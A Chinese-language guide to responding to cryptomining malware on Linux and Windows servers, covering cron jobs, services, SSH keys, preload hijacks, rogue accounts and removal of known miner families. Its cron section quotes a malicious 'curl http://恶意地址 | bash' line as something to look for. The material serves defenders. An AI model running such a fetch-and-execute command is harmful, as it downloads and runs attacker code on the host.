挖矿病毒急救手册:从发现到根除的保姆级指南

最近某公司服务器CPU突然飙升至99%,排查发现是挖矿病毒在作祟。这类病毒会占用服务器资源进行加密货币挖矿,导致业务卡顿甚至瘫痪。本文将一步步教你识别和清除挖矿病毒

挖矿病毒通常通过弱密码或漏洞入侵,在后台悄悄运行消耗资源。它们常伪装成系统文件,并通过多种方式维持运行。

1. Linux系统处置流程

(1)第一步:断网阻传播

发现异常后,先切断病毒与外界的联系:

# 查看异常网络连接(重点关注IP地址陌生的连接)
netstat -antp | grep ESTABLISHED

# 封禁可疑IP(将1.2.3.4替换为实际可疑IP)
iptables -A INPUT -s 1.2.3.4 -j DROP           # 禁止该IP访问本机
iptables -A OUTPUT -d 1.2.3.4 -j DROP      # 禁止本机访问该IP

(2)清除定时任务

病毒常设置定时任务自我恢复:

# 检查当前用户的定时任务
crontab -l

# 检查系统级定时任务(重点路径)
ls /etc/cron.*/* /var/spool/cron/*

发现可疑任务(如curl http://恶意地址 | bash)立即删除:

crontab -e      # 编辑当前用户任务
# 或直接删除文件:rm /etc/cron.d/suspicious_task

(3)检查自启动服务

病毒可能注册为系统服务:

# 查看所有开机自启服务
systemctl list-unit-files --state=enabled

# 检查可疑服务文件
ls /etc/systemd/system/*.service

发现异常服务(如名称随机的.service文件)后:

systemctl stop bad-service      # 停止服务
systemctl disable bad-service      # 禁用自启
rm /etc/systemd/system/bad-service.service      # 删除配置文件

(4)检查SSH后门

病毒可能添加免密登录密钥:

# 检查授权密钥文件
cat ~/.ssh/authorized_keys      # 当前用户
cat /root/.ssh/authorized_keys      # root用户

删除所有不认识的公钥(形如ssh-rsa AAAA...的文本)

(5)解除系统命令劫持

病毒可能劫持常用命令:

# 检查预加载劫持
cat /etc/ld.so.preload  # 正常应为空

# 解除劫持
echo "" > /etc/ld.so.preload

(6)排查可疑账户

# 查看所有系统账户
cat /etc/passwd | cut -d: -f1

# 检查新增账户日志
grep "useradd" /var/log/auth.log

发现异常账户(如hacker)后删除:

userdel -r hacker      # 删除账户及家目录

(7)清理病毒进程

top      # 按P按CPU排序,记录高占用PID
ls -l /proc/1234/exe     # 查看PID=1234的进程路径
kill -9 1234      # 结束进程
rm -f /path/to/virus      # 删除病毒文件


2. 常见挖矿病毒专杀

(1)Cleanfda病毒

特征:篡改系统命令

# 恢复被修改的命令
cp /bin/ps.original /bin/ps

# 删除病毒文件

rm -f /etc/upat.sh

(2)Kinsing家族病毒

特征:计划任务含gi.sh

# 清除恶意任务
grep -rl "gi.sh" /etc/cron* | xargs rm -f

# 删除劫持文件
rm /lib/systemd/system/bot.service


3. Windows系统处置

(1)定位病毒进程

打开任务管理器 → 按CPU排序 → 记录高占用进程

(2)分析进程详情

管理员运行PowerShell:

# 查看进程详细信息
Get-WmiObject Win32_Process -Filter "ProcessId=1234" | Select CommandLine

(3)终止并删除

Stop-Process -Id 1234 -Force
Remove-Item "C:\恶意路径\virus.exe" -Force

(4)检查定时任务

schtasks /query /fo TABLE  # 查看所有任务
schtasks /delete /tn "恶意任务名" /f  # 删除任务

(5)检查Hosts文件

打开C:\Windows\System32\drivers\etc\hosts

删除包含矿池地址的行(如pool.minexmr.com


总结

挖矿病毒处置三步走:

  • 1. 断网:阻断病毒通信
  • 2. 清源:删除病毒文件/任务/账户
  • 3. 加固:修复漏洞加强防护